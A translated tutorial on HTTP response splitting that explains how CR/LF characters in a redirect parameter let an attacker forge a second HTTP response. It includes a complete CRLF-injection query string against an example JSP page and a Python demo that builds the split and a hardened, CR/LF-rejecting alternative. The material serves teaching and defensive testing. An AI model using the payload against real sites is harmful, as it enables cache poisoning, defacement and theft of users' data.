Translation:

<1> Principle overview

HTTP Response Splitting (rendered here as "HTTP response header truncation") is a newer attack technique from which several other attacks are derived: web cache poisoning, cross-user defacement and cross-site scripting. An attacker can use it to obtain sensitive user information, including authentication data such as user names and passwords. The problem can exist in many environments: Microsoft ASP and ASP.NET, IBM WebSphere, popular servers such as Apache and Squid, and even the IE 6.0 SP1 browser. The root cause is that illegal characters submitted by the user, in particular CR (%0d) and LF (%0a), are not strictly filtered before being written into a response header.

By sending a specially crafted request, the attacker forces the server (or whatever parses its output: the browser, a proxy, a cache) to treat the returned data as two responses instead of one. When the second response can be fully controlled through the crafted request, the attack is carried out by sending two requests, A and B. Request A contains the crafted data, which causes the server to emit two responses, R1 and R2, where R2 is fully controlled by the attacker through the construction of A. R1 is returned as the response to A, while R2 is taken as the response to B, even though R2 was never generated by the server for B (B should have received R3):

    Request A -------------> Web Server (R1, R2)
    Request B -------------> Web Server (supposed to be R3)
    Web Server (R1) -------> A
    Web Server (R2) -------> B

<2> Basic technique

HTTP Response Splitting attacks depend on being able to place user input in an HTTP header and on being able to insert the special characters that terminate a header line and a response. The most likely places are the Location field (redirects) and the Set-Cookie field.

Example: the page /redir_lang.jsp

    <% response.sendRedirect("/by_lang.jsp?lang=" + request.getParameter("lang")); %>

When "english" is submitted as the parameter, the client is redirected to /by_lang.jsp?lang=english, and the normal response looks like this:

    HTTP/1.1 302 Moved Temporarily
    Date: Wed, 24 Dec 2003 12:53:28
    Location: http://10.1.1.1/by_lang.jsp?lang=english
    Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009 with
    Content-Type: text/html
    Set-Cookie: JSESSIONID=1PMRZOIQQzZIE6iivsREG82pq9B017h4YoHZ62RXjApqwBE!-12510119693; path=/
    Connection: Close
    ............................

From the response above we can see that the input parameter is copied verbatim into an HTTP header, so we can use CR/LF characters to end the Location header early and then append headers, and an entire second response, of our own:

    /redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a

The injected Content-Length: 0 closes the server's 302 response after the Location header, and everything after the following blank line is parsed as a second, attacker-supplied 200 OK response; the Content-Length: 19 in that second response tells the client exactly how many bytes of attacker-chosen body to read.
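A runnable illustration of the splitting mechanics described above, added here as an example and not code from the original article. One function mimics the vulnerable redir_lang.jsp by concatenating the URL-decoded lang parameter into the Location header; a minimal HTTP/1.x framer shows how a keep-alive client or caching proxy carves the resulting byte stream into two responses; and a hardened builder refuses CR/LF before the value reaches any header. The 19-byte body, the header set emitted by the emulated server, and the function names are constructed for this example (the host 10.1.1.1 and payload shape are the article's); the framer is deliberately simplified and handles Content-Length framing only, not chunked encoding.

```python
from urllib.parse import quote, unquote

# Constructed 19-byte body for the attacker-supplied second response.
FAKE_BODY = b"<html>Owned!</html>"

# Constructed payload with the same shape as the one in the article: the
# injected "Content-Length: 0" closes the server's 302, and everything after
# the blank line is a complete attacker-written 200 OK response.
EVIL_LANG = (
    "foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    f"Content-Length:%20{len(FAKE_BODY)}%0d%0a%0d%0a"
    + quote(FAKE_BODY)
)


def build_redirect_vulnerable(lang: str) -> bytes:
    """Emulates redir_lang.jsp: the already URL-decoded parameter is pasted
    straight into the Location header. The header set is a constructed
    subset of the WebLogic response shown in the article."""
    response = (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"Location: http://10.1.1.1/by_lang.jsp?lang={lang}\r\n"
        "Content-Type: text/html\r\n"
        "Content-Length: 0\r\n"
        "Connection: keep-alive\r\n"
        "\r\n"
    )
    return response.encode("latin-1")


def build_redirect_hardened(lang: str) -> bytes:
    """Same redirect, but CR and LF in the parameter are refused before the
    value reaches a header (percent-encoding the value is the other option)."""
    if "\r" in lang or "\n" in lang:
        raise ValueError("CR/LF in redirect target rejected")
    return build_redirect_vulnerable(lang)


def split_responses(raw: bytes) -> list:
    """Frame a byte stream into HTTP/1.x responses the way a keep-alive
    client or caching proxy does: status line, headers up to the first blank
    line, then exactly Content-Length body bytes. Framing stops when the next
    status line is not an HTTP status line, so the server's leftover headers
    after the injected body are discarded, as a lenient client would do."""
    responses = []
    pos = 0
    while True:
        head_end = raw.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break
        lines = raw[pos:head_end].decode("latin-1").split("\r\n")
        status = lines[0]
        if not status.startswith("HTTP/"):
            break
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        length = int(headers.get("content-length", "0"))
        body = raw[body_start:body_start + length]
        responses.append({"status": status, "headers": headers, "body": body})
        pos = body_start + length
    return responses


def demo() -> list:
    """Send the crafted parameter through the vulnerable page and return what
    a client sees: two responses, the second fully attacker-controlled."""
    lang = unquote(EVIL_LANG)  # what request.getParameter("lang") hands back
    return split_responses(build_redirect_vulnerable(lang))


if __name__ == "__main__":
    for i, r in enumerate(demo(), 1):
        print(f"Response {i}: {r['status']}  "
              f"headers={sorted(r['headers'])}  body={r['body']!r}")
```

With the benign value "english" the framer sees one 302; with EVIL_LANG it sees the 302 followed by a 200 OK carrying the constructed body, which is exactly what request B (or a cache sitting in front of the server) would consume. The hardened builder raises on the same input, which is the behaviour to look for when testing whether a redirect or Set-Cookie sink is still splittable.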